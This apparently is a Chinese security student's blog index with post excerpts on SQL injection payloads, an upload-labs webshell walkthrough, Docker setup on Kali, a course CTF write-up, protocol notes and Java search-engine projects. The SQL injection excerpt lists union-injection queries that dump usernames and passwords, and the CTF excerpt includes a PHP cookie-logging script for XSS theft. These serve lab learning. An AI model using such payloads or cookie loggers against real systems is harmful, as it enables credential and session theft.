SQL注入常见利用姿势
数据查询SQL语句123456select group_concat(schema_name) from information_schema.schemata -- 查询所有数据库select group_concat(table_name) from information_schema.tables where table_schema = database() -- 查询当前数据中所有表select group_concat(column_name) from information_schema.columns where table_name = 'users' -- 查询指定表中的所有字段select group_concat(username, '~', password) from users -- 查询users表中值 联合注入(Union注入)查询所有数据库1id=-1 union select 1,2,group_concat(schema_name) from...
upload-labs 靶场通关笔记
靶场搭建Windows下载作者提供的PHPStudy整合版,避免bug https://github.com/c0ny1/upload-labs/releases Linux不推荐使用,有一些攻击利用了Windows的特性,Linux上传后可能连接不上木马(而且多后缀解析也存在问题) 1docker run -d -p 80:80 cuer/upload-labs Pass-01源码审计12345678910111213141516171819<script type="text/javascript"> function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); ...
在Kali(Debian)系统上安装docker&docker-compose并给docker配置socks代理
在Kali(Debian)系统上安装docker&docker-compose并给docker配置socks代理安装docker方法一:使用kali官方的安装方式(经测试,安装的docker版本为20.0)参考链接如下 Installing Docker on Kali Linux 由于现在docker hub的镜像站都挂了(可能?),为了方便的配置代理拉取镜像,推荐使用方法二来安装docekr,可以通过编辑/etc/docker/daemon.json文件来设置代理地址,个人感觉较为方便 方法二:1、对APT软件包换源(以清华大学镜像站为例)打开清华大学镜像站kali软件仓库帮助 复制换源地址 打开终端,执行sudo vim /etc/apt/source.list 如上图,将官方源注释掉,将换源地址复制进去(或者全部删除只保留换源地址) 执行sudo apt update更新缓存 2、按顺序执行以下命令123456789101112131415161718192021# 卸载dockerfor pkg in docker.io docker-doc...
JMU-net-security-lesson-design WriteUp
0. 内网信息 主机名(域名) IP 端口 www.qianxin.com 172.10.10.100 80 news.qianxin.com 172.10.10.102 80 blog.qianxin.com 172.10.10.101 80 mysql 192.168.100.40 3306 redis 192.168.100.101 6379 oa-web 192.168.100.100 22、80 1. 登录www.qianxin.com后台获取flag1在kali操作机部署简单的xxs获取服务,在家目录新建一个index.php文件并输入以下内容 123456<?php$cookie = $_GET['cookie'];$log = fopen("cookie.txt", "a");fwrite($log, $cookie . "\n");fclose($log);?> 使用命令启动PHP 内置服务器 1php -S...
网络协议分析-重点总结
第一章 计算机网络基础1.1 网络的概念和组成连接到Internet的所有的这些设备称为主机或终端系统 终端系统由通信链接连在一起。常见的通信链接有双绞线、同轴电缆、光纤,负责传输原始的比特流 不是单一通过通信链接连接,通过中介交换设备间接相连,这些中介交换设备称为包交换器,传输的信息块称为包,当今Internet上最基本的两种是交换机、路由器 ISP——Internet Service ProviderTCP——Transfer Control ProtocolIP——Internet Protocol 还有许多专用网络,这些网络称为企业内部互联网 1.2 计算机网络参考模型现代网络通信结构以层划分,各层和各层协议的集合称为网络体系,特定系统使用的一组协议称为协议堆栈 OSI模型 重点 1.3 网络程序寻址方式存在竞争信道时,解决此问题的协议是MAC(Medium Access Control) 子层 IP地址的分类 IP地址根据网络号和主机号来分,分为A、B、C三类及特殊地址D、E。 ...
Java课程设计之——Elasticsearch篇
0、团队项目博客1、主要使用的技术及开发工具 Elasticsearch 7.17.3 REST API Elasticsearch java API Client 7.17.3 Kibana 7.17.3 Jackson 2.12.3 2、Elasticsearch简介Elasticsearch 是一个分布式的免费开源搜索和分析引擎,适用于包括文本、数字、地理空间、结构化和非结构化数据等在内的所有类型的数据。可用于应用程序搜索,网站搜索等诸多使用场景。 使用ES,我们可以快速的开发一个自己的搜索引擎,ES会帮我们在庞大的数据中建索 3、mapping的设计思路有四个数据要存进ES建索,分别是url、title、text、declareTime,他们的数据类型分别是keyword、text、text、date;其中date的格式为xxxx-xx-xx...
LCZ-Java课程设计-基于学院网站的搜索引擎
1、团队名称、团队成员介绍、任务分配,团队成员课程设计博客链接 姓名 成员介绍 任务分配 课程设计博客链接 lrui1(组长) 头发日渐稀疏 Elasticsearch后台功能实现,Web前端设计及后端衔接。 Elasticsearch后台功能实现Web前端设计 cx 帮忙端茶送水 爬虫功能实现 https://www.cnblogs.com/xiudian7/p/17040344.html zbw 负责拿外卖 GUI版搜索引擎实现 2、项目简介,涉及技术基于学院网站的搜索引擎,可以对学院网站进行抓取、建索、搜索、摘要显示、按时间范围搜索 参考项目:Java团队课程设计——基于学院的搜索引擎(18级学长们真nb,尽力做了) 涉及技术: Jsoup HTML+CSS,javascript jQuery&jQuery-UI Bootstrap5 Elasticsearch IK...